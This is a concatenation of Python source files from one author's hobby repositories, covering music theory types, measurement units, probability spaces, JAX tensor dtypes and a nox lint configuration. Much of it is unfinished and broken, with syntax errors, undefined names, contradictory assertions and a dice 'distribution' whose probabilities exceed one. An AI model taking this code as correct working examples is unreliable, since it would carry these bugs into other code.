@staticmethod
def sample_dirichlet_noise(
spacetime: Spacetime,
alpha,
):
placements = game.available_placements()
n = len(actions)
return rand(Dirichlet(n, alpha))
```
#### File: _realizing/_op/actions.py
```python
from ..realizing import Realizing
class Actions(
Realizing,
):
def available_actions(self):
pass
```
#### File: _realizing/_op/state.py
```python
from abc import abstractmethod
from .._world import World
class State(
World,
):
@abstractmethod
def read_state(self):
"""
Read a state from stdin.
"""
pass
@abstractmethod
def print_state(self):
"""
Write a state to stdout.
"""
pass
```
#### File: fractal/world/_statics.py
```python
from abc import ABCMeta
from abc import abstractmethod
class AbstractStatics(
metaclass=ABCMeta,
):
@abstractmethod
def initial_time(cls) -> WorldTime:
pass
@abstractmethod
def initial_position(cls) -> WorldPosition:
pass
@classmethod
def initial_worldstate(cls) -> WorldState:
raise NotImplementedError
@abstractmethod
@classmethod
def has_world_ended(cls) -> bool:
raise NotImplementedError
```
|
{
"source": "jedhsu/language",
"score": 2
}
|
#### File: category/__collection/collection.py
```python
from typing import Any
__all__ = ["AbstractCollection"]
class AbstractCollection:
# specifies the contained type of this collection
type: Any
@classmethod
def __class_getitem__(cls, item):
pass
# [TODO} finish this
```
#### File: grammar/lex/_.py
```python
from types import CodeType as Code
def construct():
...
def create() -> Object:
...
def define() -> Code:
...
```
#### File: term/_tests/test__init.py
```python
from ..form import Form, Term
def test_behavior():
assert type(Term) == Form, type(Term)
assert issubclass(Term, Form)
class TestTerm:
pass
# class TestForm:
# def test_parents(self):
# assert Form.__bases__ is None, Form.__bases__
```
#### File: syntax/_tests/test_symbol.py
```python
from ..symbol import Symbol
class TestSymbol:
def test_init(self):
a = Symbol("a")
assert a == "a"
assert isinstance(a, str)
assert isinstance(a, Symbol)
```
#### File: type/typing/bound.py
```python
from typing import Type as _Type
from typing import Generic
from ..operation import Operation
# [TODO] figure out the metaclass hacking later, spec the logic first with an encapsulated type
class Equivalence:
_type: type
def __eq__(self, t: type):
return self._type == t
# define a relation on types
# can make relation itself generic later
# need BinaryComparisonOperation
class TypeRelation(Generic[type], Operation.Binary):
def __call__(self):
pass
# [TODO] glue above and bottom
def subtype_of(
class Type(PartialOrder, Equivalence):
_type: type
```
#### File: symbol/tests/test_symbol.py
```python
from ..symbol import Symbol
class TestSymbol:
def test_init(self):
A = Symbol("A")
assert isinstance(A, Symbol)
class TestDefault:
def test_A(self):
A = Symbol.A()
assert A == Symbol("A")
class TestCompose:
def test_add(self):
assert Symbol("A") + Symbol("B") == Symbol("AB")
class TestDisplay:
def test_repr(self):
assert repr(Symbol("A")) == "A"
```
|
{
"source": "jedhsu/measure",
"score": 3
}
|
#### File: graphical/distance/pixel.py
```python
from abc import ABCMeta
from wich.measure.unit import UnitDistance
from wich.literal.integer import Integer
from ._distance import GraphicalDistance
__all__ = [
"Pixel",
]
class Pixel(
Integer,
GraphicalDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
int: int,
):
super(Integer, self).__init__(
int,
)
```
#### File: graphical/distance/typepoint.py
```python
from abc import ABCMeta
from wich.measure.unit import UnitDistance
from wich.measure.fractional import Quarter
from ._distance import GraphicalDistance
__all__ = [
"Typepoint",
]
class Typepoint(
Quarter,
GraphicalDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
int: int,
):
super(Typepoint, self).__init__(
int,
)
```
#### File: distance/metric/millimeter.py
```python
from abc import ABCMeta
from ..._unit import UnitDistance
from ._distance import MetricDistance
from wich.literal.float_ import Float
__all__ = [
"Millimeter",
]
class Millimeter(
Float,
MetricDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
float: float,
):
super(Millimeter, self).__init__(
float,
)
```
#### File: rotational/angle/degrees.py
```python
from abc import ABCMeta
from wich.literal.float_ import Float
from wich.measure.unit import UnitAngle
from ._angle import Angle
__all__ = [
"Degrees",
]
class Degrees(
Float,
Angle,
UnitAngle,
):
__metaclass__ = ABCMeta
def __init__(
self,
float: float,
):
super(Degrees, self).__init__(
float,
)
```
#### File: measure/rotational/rotation.py
```python
from ..count import Count
from ._rotational import RotationalMeasure
__all__ = [
"Rotation",
]
class Rotation(
Count,
RotationalMeasure,
):
def __init__(
self,
count: int,
):
super(Rotation, self).__init__(
count,
)
```
|
{
"source": "jedhsu/music",
"score": 3
}
|
#### File: class_/audioa/display.py
```python
def format_accidental(accidental: str) -> str:
if accidental == "s":
return "\u266f"
elif accidental == "f":
return "\u266d"
else:
raise KeyError("Not an accidental.")
class _Display_(_Key):
def __repr__(self):
keyname = self._key.name
keyname = keyname.replace("s", format_accidental("s"))
keyname = keyname.replace("s", format_accidental("s"))
return keyname
```
#### File: class_/time/atom.py
```python
from dataclasses import dataclass
from typing import Sequence
from ._space import Space
from .quark import Quark
__all__ = ["Atom"]
@dataclass
class Atom(
tuple[Quark],
Space,
):
index: int
def __init__(
self,
beats: Sequence[Quark],
index: int,
):
assert index > 0, "Index must be positive"
self.index = index
super(Atom, self).__new__(
tuple,
beats,
)
def __repr__(self) -> str:
return f"Atom-{self.index}"
```
#### File: time/bar/_bar.py
```python
from dataclasses import dataclass
from typing import Sequence
from .._space import Space
from ..beat import Beat
__all__ = ["Bar"]
@dataclass
class Bar(
tuple[Beat],
Space,
):
index: int
def __init__(
self,
beats: Sequence[Beat],
index: int,
):
self.index = index
assert 1 <= index <= 4, "Not a valid index."
assert len(beats) == 4, "Must have four beats in a bar."
super(Bar, self).__new__(
tuple,
beats,
)
def __repr__(self) -> str:
return f"Bar-{self.index}"
```
#### File: class_/time/beat.py
```python
from dataclasses import dataclass
from typing import Sequence
from ._space import Space
from .step import Step
__all__ = ["Beat"]
@dataclass
class Beat(
tuple[Step],
Space,
):
index: int
def __init__(
self,
steps: Sequence[Step],
index: int,
):
self.index = index
assert 1 <= index <= 4, "Not a valid index."
assert len(steps) == 4, "Must have four steps in a beat."
super(Beat, self).__new__(
tuple,
steps,
)
def __repr__(self) -> str:
return f"Beat-{self.index}"
```
#### File: music/distance/_arithmetic.py
```python
from ._interval import Interval
__all__ = ["IntervalArithmetic"]
class IntervalArithmetic(
Interval,
):
def __add__(
self,
it: Interval,
) -> Interval:
return Interval(self.steps + it.steps)
def __sub__(
self,
it: Interval,
) -> Interval:
return Interval(self.steps - it.steps)
```
#### File: aural/cent/_cent.py
```python
from .._interval import Interval
__all__ = ["Cent"]
class Cent(
int,
Interval,
):
def __init__(
self,
val: int,
):
super(Cent, self).__new__(
int,
val,
)
```
#### File: distance/aural/_interval.py
```python
from __future__ import annotations
from dataclasses import dataclass
from enum import Enum
from fractions import Fraction
from ._ratio import FrequencyRatio
__all__ = ["Interval"]
class AudioInterval:
pass
# class _IntervalEnum(
# Enum,
# ):
# O = 0
# m2 = 1
# M2 = 2
# m3 = 3
# M3 = 4
# P4 = 5
# m5 = 6
# P5 = 7
# m6 = 8
# M6 = 9
# m7 = 10
# M7 = 11
# @dataclass
# class _Interval:
# # TODO: switch to semitone repr
# interval: _IntervalEnum
# octaves: int
# class _Interval_(
# _Interval,
# ):
# def semitones(self) -> int:
# """ Number of semitones. """
# return 12 * self.octaves + self.interval.value
# # TODO: make perfect
# def ratio(self) -> float:
# """
# Ratio of the interval's frequency??
# """
# return 2 ** Fraction(self.semitones(), 12)
# def purity(self) -> int:
# ...
# class Interval(NamedTuple):
# bot: Frequency
# top: Frequency
# @property
# def consonance(self):
# raise NotImplementedError
# @staticmethod
# def just_intonation():
# raise NotImplementedError
# class Interval(
# _Display_,
# _Interval_,
# _Interval,
# ):
# def __init__(
# self,
# interval: _IntervalEnum,
# octaves: int,
# ):
# super().__init__(interval, octaves)
# @staticmethod
# def from_semitones(semitones: int):
# octaves, step = divmod(semitones, 12)
# return Interval(_IntervalEnum(step), octaves)
# def __add__(self, i: Interval) -> Interval:
# return add(self, i)
# def add(i1: Interval, i2: Interval) -> Interval:
# semitones = i1.semitones() + i2.semitones()
# return Interval.from_semitones(semitones)
# m2 = Interval.from_semitones(1)
# M2 = Interval.from_semitones(2)
# m3 = Interval.from_semitones(3)
# M3 = Interval.from_semitones(4)
# P4 = Interval.from_semitones(5)
# m5 = Interval.from_semitones(6)
# P5 = Interval.from_semitones(7)
```
#### File: a/shp/as0.py
```python
from fivear.musical.key import ASharp
from ..._pitch import Pitch
__all__ = ["As0"]
class As0(
Pitch,
):
def __init__(
self,
cents: Cent,
):
# super(As0, self).__init__()...
pass
```
#### File: integer/audio/display.py
```python
from ._pitch import Pitch
__all__ = ["Display"]
class Display(
Pitch,
):
def __repr__(self):
return f"{self.key}{self.level}"
```
#### File: amplitude/convert/from_.py
```python
from ...decibel._decibel import Decibel
from ...power._power import Power
from .._amplitude import Amplitude
__all__ = ["From"]
class From:
@staticmethod
def from_decibel(db: Decibel) -> Amplitude:
return Amplitude(10.0 ** (db / 20))
@staticmethod
def from_power(pow: Power) -> Amplitude:
return Amplitude(10.0 ** (pow / 10))
```
#### File: convert/_test/test_from_.py
```python
from pytest import approx
from ..from_ import Decibel
from ..from_ import Power
from ..from_ import Amplitude
from ..from_ import From
class TestAmplitudeFrom:
def test_from_decibel(self):
db = Decibel(-10)
assert From.from_decibel(db) == approx(0.3162276)
assert From.from_decibel(db) == approx(Amplitude(0.3162276))
def test_from_power(self):
pow = Power(-10)
assert From.from_power(pow) == approx(0.1)
assert From.from_power(pow) == approx(Power(0.1))
```
#### File: convert/_test/test_into_.py
```python
from pytest import approx
from ..into_ import Decibel
from ..into_ import Power
from ..into_ import Into
class TestAmplitudeInto:
def test_into_decibel(self):
ampl = Into(0.1)
assert ampl.into_decibel() == approx(-20)
assert ampl.into_decibel() == approx(Decibel(-20))
def test_into_power(self):
ampl = Into(0.1)
assert ampl.into_power() == approx(-10)
assert ampl.into_power() == approx(Power(-10))
# def test_into_phon(self):
# pass
```
#### File: volume/phon/_phon.py
```python
__all__ = ["Phon"]
class Phon(float):
def __init__(self, value: float):
"""Wraps immutable float."""
super(Phon, self).__new__(float, value)
```
#### File: volume/power/_power.py
```python
from dataclasses import dataclass
from .._volume import Volume
@dataclass
class Power(
float,
Volume,
):
def __init__(
self,
val: float,
):
# [TODO] confirm
assert 0.0 <= self <= 1.0, ValueError("Power must be lower than 0.")
super(Power, self).__new__(
float,
val,
)
```
|
{
"source": "jedhsu/probability",
"score": 2
}
|
#### File: algebra/_tests/test_sigma.py
```python
from ..sigma import AbstractSpace, Set, SigmaAlgebra, Test
class TestSigmaAlgebra:
def test_init(self):
alg = SigmaAlgebra(AbstractSpace(1, 2, 3))
assert isinstance(alg, SigmaAlgebra)
assert isinstance(alg, Set)
assert alg.space == AbstractSpace(1, 2, 3)
def test_contains_generating_set(self):
alg = SigmaAlgebra(AbstractSpace(1, 2, 3))
assert alg in
```
#### File: measure/_tests/test_aspace.py
```python
from ..aspace import AbstractSpace, Set, Test
class TestAbstractSpace:
def test_init(self):
aspace = Test.integers()
assert isinstance(aspace, AbstractSpace)
assert isinstance(aspace, Set)
assert len(aspace) == 3
```
#### File: probability/probability/distribution.py
```python
from __future__ import annotations
from fractions import Fraction
from typing import Mapping
from .event import Event
from .measurable import Measurable
from .moment import Moment
from .probability import Probabilistic
__all__ = ["Distribution"]
class MomentGeneratingFunction:
def moment_generating_function(self):
return Expectation(exp(t * X))
class Distribution(
Moment,
MomentGeneratingFunction,
Mapping[Probabilistic, Measurable],
):
pass
class Cumulative(Distribution):
"""
Cumulative distribution function.
"""
def __call__(self):
pass
class Test:
@staticmethod
def dice_roll():
dist = {
Event(1): Fraction(1, 6),
Event(2): Fraction(2, 6),
Event(3): Fraction(3, 6),
Event(4): Fraction(4, 6),
Event(5): Fraction(5, 6),
Event(6): Fraction(6, 6),
}
# [TODO] need to deal with the typing here
return Distribution(dist)
```
#### File: probability/space/measure.py
```python
from dataclasses import dataclass
from typing import Generic
from typing import Hashable
from typing import TypeVar
from sympy import Expr
from ..measure import MeasurableFunction
from .measurable import MeasurableSpace
__all__ = ["MeasureSpace"]
T = TypeVar("T", bound=Hashable)
@dataclass(frozen=True)
class MeasureSpace(
MeasurableSpace[T],
Generic[T],
):
"""
Inherits omega space and sigma-algebra.
"""
_μ_: MeasurableFunction[T]
# [Properties]
@property
def monotonic(self, set_A: set[T], set_B: set[T]) -> Optional[Expression]:
"""
Monotonicity A ⊂ B implies μ(A) <= μ(B)
"""
# [TODO] Expression can be subtyped to Inequality
if set_A in set_B:
return Expr(self._μ_(set_A) <= self._μ_(set_B))
# [TODO] use sympy structs for the countably infinite stuff
@property
def subadditive(self, set: set[T], countable_union_of_sets) -> Optional[Expression]:
pass
@property
def continuous_from_below(self, seq) -> Optional[Expression]:
pass
@property
def continuous_from_above(self, seq) -> Optional[Expression]:
pass
```
|
{
"source": "jedhsu/tensor",
"score": 2
}
|
#### File: jedhsu/tensor/noxfile.py
```python
import nox
from nox_poetry import Session
from nox_poetry import session
from pathlib import Path
from textwrap import dedent
import sys
import shutil
package = "{{cookiecutter.package_name}}"
python_versions = [
"3.9",
"3.8",
"3.7",
]
nox.needs_version = ">= 2021.6.6"
nox.options.sessions = (
"pre-commit",
# "mypy",
# "typeguard",
# "security",
# "tests",
# "examples",
# "docs-build",
)
"""
*activate*
Activates venv using precommit hooks.
"""
def activate(
session: Session,
):
if session.bin is None:
return
virtualenv = session.env.get("VIRTUAL_ENV")
if virtualenv is None:
return
hookdir = Path(".git") / "hooks"
if not hookdir.is_dir():
return
for hook in hookdir.iterdir():
if hook.name.endswith(".sample") or not hook.is_file():
continue
text = hook.read_text()
bindir = repr(session.bin)[1:-1] # strip quotes
if not (
(Path("A") == Path("a") and bindir.lower() in text.lower())
or (bindir in text),
):
continue
lines = text.splitlines()
if not (lines[0].startswith("#!") and "python" in lines[0].lower()):
continue
header = dedent(
f"""\
import os
os.environ["VIRTUAL_ENV"] = {virtualenv!r}
os.environ["PATH"] = os.pathsep.join((
{session.bin!r},
os.environ.get("PATH", ""),
))
"""
)
lines.insert(1, header)
hook.write_text("\n".join(lines))
"""
*lint*
Lint using pre-commit.
"""
@session(
name="pre-commit",
python="3.9",
)
def lint(
session: Session,
):
args = session.posargs or [
"run",
"--all-files",
"--show-diff-on-failure",
]
session.install(
"black",
"darglint",
"flake8",
"flake8-bandit",
"flake8-bugbear",
"flake8-docstrings",
"flake8-rst-docstrings",
"pep8-naming",
"pre-commit",
"pre-commit-hooks",
"reorder-python-imports",
)
session.run("pre-commit", *args)
if args and args[0] == "install":
activate(session)
# """
# *static-types*
# Check for well-typedness through _mypy_.
# """
# @session(
# python=python_versions,
# )
# def mypy(
# session: Session,
# ) -> None:
# args = session.posargs or [
# "src",
# "tests",
# "docs/conf.py",
# ]
# session.install(".")
# session.install(
# "mypy",
# "pytest",
# )
# session.run(
# "mypy",
# *args,
# )
# if not session.posargs:
# session.run(
# "mypy",
# f"--python-executable={sys.executable}",
# "noxfile.py",
# )
# """
# *tests*
# Runs the test suite with _pytest_.
# """
# @session(
# python=[
# "3.9",
# "3.8",
# "3.7",
# ]
# )
# def tests(
# session: Session,
# ) -> None:
# session.install(".")
# session.install(
# "coverage[toml]",
# "pytest",
# "pygments",
# )
# try:
# session.run(
# "coverage",
# "run",
# "--parallel",
# "-m",
# "pytest",
# *session.posargs,
# )
# finally:
# if session.interactive:
# session.notify(
# "coverage",
# posargs=[],
# )
# """
# *runtime-types*
# Checks for type safety at runtime with _typeguard_.
# """
# @session(
# python=python_versions,
# )
# def typeguard(
# session: Session,
# ):
# session.install(".")
# session.install(
# "pytest",
# "typeguard",
# "pygments",
# )
# session.run(
# "pytest",
# f"--typeguard-packages={package}",
# *session.posargs,
# )
# """
# *security*
# Scans dependencies for insecure packages through _safety_.
# """
# @session(python="3.9")
# def security(
# session: Session,
# ) -> None:
# requirements = session.poetry.export_requirements()
# session.install("safety")
# session.run(
# "safety",
# "check",
# "--full-report",
# f"--file={requirements}",
# )
# """
# *coverage*
# Analyzes code coverage with _coverage_.
# """
# @session
# def coverage(
# session: Session,
# ) -> None:
# args = session.posargs or ["report"]
# session.install("coverage[toml]")
# if not session.posargs and any(Path().glob(".coverage.*")):
# session.run("coverage", "combine")
# session.run("coverage", *args)
# """
# *docs-build*
# Build the docs.
# """
# @session(
# name="docs-build",
# python="3.9",
# )
# def docs_build(
# session: Session,
# ) -> None:
# """Build the documentation."""
# args = session.posargs or [
# "docs",
# "docs/_build",
# ]
# session.install(".")
# session.install(
# "sphinx",
# "sphinx-click",
# "sphinx-rtd-theme",
# )
# build_dir = Path(
# "docs",
# "_build",
# )
# if build_dir.exists():
# shutil.rmtree(build_dir)
# session.run(
# "sphinx-build",
# *args,
# )
# """
# *build-with-view*
# Build and serve the documentation with live reloading on changes.
# """
# @session(
# python="3.9",
# )
# def docs(
# session: Session,
# ) -> None:
# args = session.posargs or [
# "--open-browser",
# "docs",
# "docs/_build",
# ]
# session.install(".")
# session.install(
# "sphinx",
# "sphinx-autobuild",
# "sphinx-click",
# "sphinx-rtd-theme",
# )
# build_dir = Path("docs", "_build")
# if build_dir.exists():
# shutil.rmtree(build_dir)
# session.run(
# "sphinx-autobuild",
# *args,
# )
# """
# *examples*
# Run examples with xdoctest.
# """
# @session(
# python=python_versions,
# )
# def examples(
# session: Session,
# ) -> None:
# args = session.posargs or ["all"]
# session.install(".")
# session.install("xdoctest[colors]")
# session.run(
# "python",
# "-m",
# "xdoctest",
# package,
# *args,
# )
```
#### File: _array/tests/test_fn.py
```python
# from ..fn import Gradient
# ∇ = 1
# \u2207
# class TestFn:
# def test_lambda(self):
# assert Gradient.λ == 1
```
#### File: datatype/complex/x128.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._complex import Complex
__all__ = ["c128"]
class c128(
jnp.bool_,
Complex,
Datatype,
):
def __init__(
self,
value: int,
):
super(c128, self).__init__(
self,
value,
)
```
#### File: datatype/float_/x64.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._float import Float
__all__ = ["f64"]
class f64(
jnp.float64,
Float,
Datatype,
):
def __init__(
self,
value: int,
):
super(f64, self).__init__(
self,
value,
)
```
#### File: integer/unsigned/x16.py
```python
import jax.numpy as jnp
from ..._datatype import Datatype
from .._integer import Integer
from ._unsigned import Unsigned
__all__ = ["u16"]
class u16(
jnp.uint16,
Unsigned,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(u16, self).__init__(
self,
value,
)
```
#### File: datatype/integer/x16.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._integer import Integer
__all__ = ["i16"]
class i16(
jnp.int16,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(i16, self).__init__(
self,
value,
)
```
#### File: datatype/integer/x64.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._integer import Integer
__all__ = ["i64"]
class i64(
jnp.int64,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(i64, self).__init__(
self,
value,
)
```
#### File: geometric/manipulation/repeat.py
```python
import jax.numpy as jnp
from ._operator import Manipulation
__all__ = ["Pad"]
class Repeat(
jnp.repeat,
Manipulation,
):
def __init__(
self,
*args,
**kwargs,
):
super(Repeat, self).__init__(
*args,
**kwargs,
)
```
#### File: logical/boolean/all.py
```python
import jax.numpy as jnp
from ._operator import BooleanOperator
__all__ = ["BooleanAll"]
class BooleanAll(
BooleanOperator,
):
operator = jnp.all
def __init__(
self,
*args,
**kwargs,
):
super(BooleanAll, self).__init__(
*args,
**kwargs,
)
```
#### File: tensor/coordinate/_coordinate.py
```python
from dataclasses import dataclass
from typing import Sequence
__all__ = ["Coordinate"]
@dataclass
class Coordinate(
tuple[int, ...],
):
def __init__(
self,
elements: Sequence[int],
):
super(Coordinate, self).__new__(
tuple,
elements,
)
@classmethod
def create(
cls,
*element: int,
):
return cls([*element])
```
#### File: _tensor_old/sized/_sized.py
```python
from math import prod
from typing import Sequence
from .dtype import *
__all__ = ["AbstractSizedArray"]
class _AbstractSizedArray_:
dim: Sequence[int]
class _Eq_(_AbstractSizedArray_):
def __eq__(self, arr: _AbstractSizedArray_) -> bool:
return self.dim == arr.dim
class _ElementSized_(_AbstractSizedArray_):
def elsize(self):
return prod(self.dim)
class _Default_:
@staticmethod
def _1d():
return AbstractSizedArray((5,))
@staticmethod
def _2d_square():
return AbstractSizedArray((5, 5))
@staticmethod
def _2d_rect():
return AbstractSizedArray((5, 10))
@staticmethod
def _3d_cube():
return AbstractSizedArray((5, 5, 5))
# class _Display_:
# # TODO: lets see if this messes anything up
# dim: Sequence[int]
# def _build_left_border(
class _DisplayVector_:
dim: Sequence[int]
def build_display(self, max_cell_width: int = 100):
...
class _ValidateVector_:
dim: Sequence[int]
def validate(self):
assert len(self.dim) == 1, TypeError("Array dimensions not equal to 1.")
class _DisplayMatrix_:
dim: Sequence[int]
def _build_axis(self):
...
def _build_cell(self):
...
class AbstractSizedArray(
_Default_,
_ElementSized_,
_Eq_,
_AbstractSizedArray_,
):
dim: Sequence[int]
def __init__(self, dim: Sequence[int], *args, **kwargs):
self.dim = dim
super(AbstractSizedArray, self).__init__(*args, **kwargs)
def _repr_dim(self) -> str:
string = repr(self.dim)[1:-1]
return string if len(self.dim) > 1 else string[:-1]
def __repr__(self):
return f"AbstractSizedArray[{self._repr_dim()}]"
```
#### File: _tensor_old/tests/test_sized.py
```python
from ..dtype import *
from ..sized import *
from ..sized import _AbstractSizedArray_, _Default_, _ElementSized_, _Eq_
class TestAbstractSizedArray:
def test_init(self):
arr = AbstractSizedArray((1, 2))
assert arr.dim == (1, 2)
assert isinstance(arr, AbstractSizedArray)
def test_mro(self):
assert AbstractSizedArray.__mro__ == (
AbstractSizedArray,
_Default_,
_ElementSized_,
_Eq_,
_AbstractSizedArray_,
object,
)
# TODO: was trying to be explicit on testing super calls
# arr = AbstractSizedArray((1, 2))
# assert 1 == 2, super(
# AbstractSizedArray, super(AbstractSizedArray, arr).__self__
# ).__subclasshook__
# assert super(AbstractSizedArray, arr).__self_class__ == object
def test_eq(self):
assert AbstractSizedArray((5, 3)) == AbstractSizedArray((5, 3))
def test_element_sized(self):
assert AbstractSizedArray((5, 3)).elsize() == 15
def test_defaults(self):
assert AbstractSizedArray._1d() == AbstractSizedArray((5,))
def test_repr(self):
assert repr(AbstractSizedArray._1d()) == "AbstractSizedArray[5]"
assert repr(AbstractSizedArray._2d_square()) == "AbstractSizedArray[5, 5]"
```
#### File: system/axis/test__axis.py
```python
from tensor.tensor.coordinate.system.axis._axis import Axis
class TestAxis:
def test_init(self):
a = Axis(5, 0, 1)
assert isinstance(a, Axis)
assert a.ordinal == 5
assert a.origin == 0
assert a.direction == 1
def test_create(self):
a = Axis.create(5)
assert a.origin == 0
assert a.direction == 1
```
|
{
"source": "jedhsu/text",
"score": 2
}
|
#### File: face/font/face.py
```python
from dataclasses import dataclass
from typing import Union
@dataclass
class FontFace(AtRule):
line_gap_override: Annotated[
bool, property
] # [TODO] keep playing with this - but we want to clarify it's return. Time for Annotated
range: property
src: property
size_adjust: property
ascent_override: property
class FontFace(AtRule):
@property
def descent_override(self) -> Union[Normal, Percentage]:
pass
```
#### File: _typing/color/color.py
```python
from dataclasses import dataclass
from typing import Callable
from .._type import Type
# class ColorKeyword:
# pass
class Color(
Type,
):
red: Union[int, Percent]
green: Union[int, Percent]
blue: Union[int, Percent]
alpha: Union[int, Percent]
@classmethod
def from_keyword(cls):
pass
@classmethod
def from_rgb(cls):
pass
@classmethod
def from_hsl(cls):
pass
@classmethod
def from_lch(cls):
pass
@classmethod
def from_lab(cls):
"""
From lab coordinate system.
"""
pass
```
#### File: _arl/angle/spectrum.py
```python
from dataclasses import dataclass
from ._color import Angle
__all__ = ["AngleSpectrum"]
@dataclass
class AngleSpectrum:
left: Angle
right: Angle
@classmethod
def create(
cls,
left: Angle,
right: Angle,
):
assert left < right, ValueError
return cls(
left,
right,
)
class RedBlue(AngleSpectrum):
"""
Standard red blue.
"""
def __init__(self):
super(RedBlue, self).__init__(
Angle(0),
Angle(240),
)
```
#### File: color/_rgb/green.py
```python
__all__ = ["Green"]
from ._primary import PrimaryColor
class Green(
PrimaryColor,
):
def __init__(
self,
val: int,
):
super(Green, self).__init__(
val,
)
```
#### File: color/_rgb/_primary.py
```python
from abc import ABCMeta
__all__ = ["PrimaryColor"]
class PrimaryColor(
int,
# Spectral,
):
__metaclass__ = ABCMeta
def __init__(
self,
val: int,
):
assert 0 <= val <= 255
super(PrimaryColor, self).__new__(
int,
val,
)
```
#### File: color/_rgb/_rgba.py
```python
from dataclasses import dataclass
# from wich.measure.spectral import Spectral
from .red import Red
from .green import Green
from .blue import Blue
__all__ = [
"Rgba",
]
@dataclass
class Rgba(
# Spectral,
# GraphicalColor,
):
red: Red
green: Green
blue: Blue
@classmethod
def create(
cls,
red: int,
green: int,
blue: int,
):
return cls(
Red(red),
Green(green),
Blue(blue),
)
```
#### File: location/coordinate/y.py
```python
from ._coordinate import Coordinate
__all__ = [
"Coordinate",
]
class YCoordinate(
Coordinate,
):
def __init__(
self,
integer: int,
):
super(YCoordinate, self).__init__(
integer,
)
```
#### File: _elisp/ki/prefix.py
```python
from typing import Sequence
from dataclasses import dataclass
from .event import KeyEvent
from ._key import Key
__all__ = [
"PrefixKey",
]
@dataclass
class PrefixKey(
Key,
):
def __init__(
self,
events: Sequence[KeyEvent],
):
super(PrefixKey, self).__init__(
events,
)
```
#### File: terminal/param/_parameters.py
```python
from enum import Enum
class TerminalBackgroundMode(Enum):
Light = "light"
Dark = "dark"
class TerminalBackspaceErase(bool):
def __init__(self, val: bool):
super(TerminalBackspaceErase, self).__new__(
bool,
val,
)
class TerminalParameters:
pass
```
#### File: _elisp/window/_element.py
```python
from abc import ABCMeta
from wich.editor._element import Element
class WindowElement(
Element,
):
__metaclass__ = ABCMeta
def __init__(
self,
width: ElementWidth,
height: ElementHeight,
):
super(WindowElement, self).__init__(
width,
height,
)
```
#### File: property/keyword/_keyword.py
```python
class CascadeKeyword(
str,
):
def __init__(
self,
string: str,
):
super(CascadeKeyword, self).__new__(
str,
string,
)
class Test:
@staticmethod
def init():
return CascadeKeyword("abc")
```
#### File: property/_op/declare.py
```python
from ._operator import PropertyOperator
class PropertyDeclare(
PropertyOperator,
):
pass
"""
*Declaration-Block*
"""
from typing import Sequence
from dataclasses import dataclass
__all__ = ["DeclarationBlock"]
from .declaration import Declaration
@dataclass
class DeclarationBlock:
INDENT_LENGTH = 4
declarations: Sequence[Declaration]
@classmethod
def indent(cls, line: str) -> str:
"""
Indents a line of text.
"""
return " " * cls.INDENT_LENGTH + line
def into_css(self) -> str:
declarations = [decl.into_css() for decl in self.declarations]
declarations = [self.indent(decl) + ";" for decl in declarations]
declarations = ["{"] + declarations + ["}"]
declarations = "\n".join(declarations)
return declarations
```
#### File: cascade/property/shorthand.py
```python
from ._property import CascadeProperty
from ._property import CascadeValues
__all__ = ["CascadeShorthandProperty"]
class CssShorthandProperty(
CascadeProperty,
):
def __init__(
self,
values: CascadeValues,
):
super(CssShorthandProperty, self).__init__(
values,
)
```
#### File: xml/element/base.py
```python
from abc import ABCMeta
class Content:
pass
class Element:
pass
class Container(type, Element):
def __prepare__(meta, *args, **kwargs):
pass
def into_xml(self):
pass
pass
```
#### File: _geoshape/line/line.py
```python
from dataclasses import dataclass
from ..point import Point
__all__ = ["Line"]
@dataclass
class Line:
a: Point
b: Point
def __len__(self) -> float:
raise NotImplementedError
```
#### File: _quad/corner/bottomright.py
```python
from strism._geoshape import Pixel
from ._corner import QuadCorner
__all__ = ["QuadBottomRightCorner"]
class QuadBottomRightCorner(
QuadCorner,
):
def __init__(
self,
x: Pixel,
y: Pixel,
):
super(QuadBottomRightCorner, self).__init__(
x,
y,
)
```
#### File: _quad/side/top.py
```python
from dataclasses import dataclass
from strism._geoshape import Point
from ._side import QuadSide
__all__ = ["QuadTopSide"]
@dataclass
class QuadTopSide(
QuadSide,
):
def __init__(
self,
a: Point,
b: Point,
):
super(QuadSide, self).__init__(
a,
b,
)
```
#### File: _position/_test/test_xpos.py
```python
from ..xpos import Pixel
from ..xpos import Coordinate
from ..xpos import ElementXpos
class TestElementXpos:
def test_init(self):
var = ElementXpos(5)
assert isinstance(var, ElementXpos)
assert isinstance(var, Pixel)
assert isinstance(var, Coordinate)
```
#### File: text/_position/ypos.py
```python
from strism._geoshape import Pixel
from ._coordinate import Coordinate
__all__ = ["ElementYpos"]
class ElementYpos(
Pixel,
Coordinate,
):
def __init__(
self,
height: int,
):
super(ElementYpos, self).__init__(
height,
)
```
#### File: text/_shape/height.py
```python
from strism._geoshape import Pixel
from ._dimension import Dimension
__all__ = ["ElementHeight"]
class ElementHeight(
Pixel,
Dimension,
):
def __init__(
self,
height: int,
):
super(ElementHeight, self).__init__(
height,
)
```
#### File: text/_shape/width.py
```python
from strism._geoshape import Pixel
from ._dimension import Dimension
__all__ = ["ElementWidth"]
class ElementWidth(
Pixel,
Dimension,
):
def __init__(
self,
width: int,
):
super(ElementWidth, self).__init__(
width,
)
```
|
{
"source": "jedhsu/wave",
"score": 2
}
|
#### File: sound/old/pluck.py
```python
from ...base.envelope import AmplitudeEnvelope, Envelope, LevelEnvelope
from fourear.base.frequency.frequency import Frequency
from ...base.sampling import SamplingParameters
from ...base.soundwave import Soundwave
# from ...transform.fill import Fill
from ...base.primary import PrimaryWave, PrimaryWaveType
from ..sound import Sound
class Pluck(Sound):
def __init__(
self,
name: str,
fundamental: Frequency,
amplitude_envelope: AmplitudeEnvelope,
sampling_parameters: SamplingParameters,
):
self.__fundamental = fundamental
self.__amplitude_envelope = amplitude_envelope
super().__init__(name, sampling_parameters)
def synthesize(self) -> Soundwave:
saw = PrimaryWave(
PrimaryWaveType.SAWTOOTH,
self.fundamental,
self.amplitude_envelope,
self._sampling_parameters,
).synthesize()
# TODO: ugly grammar, clean me later
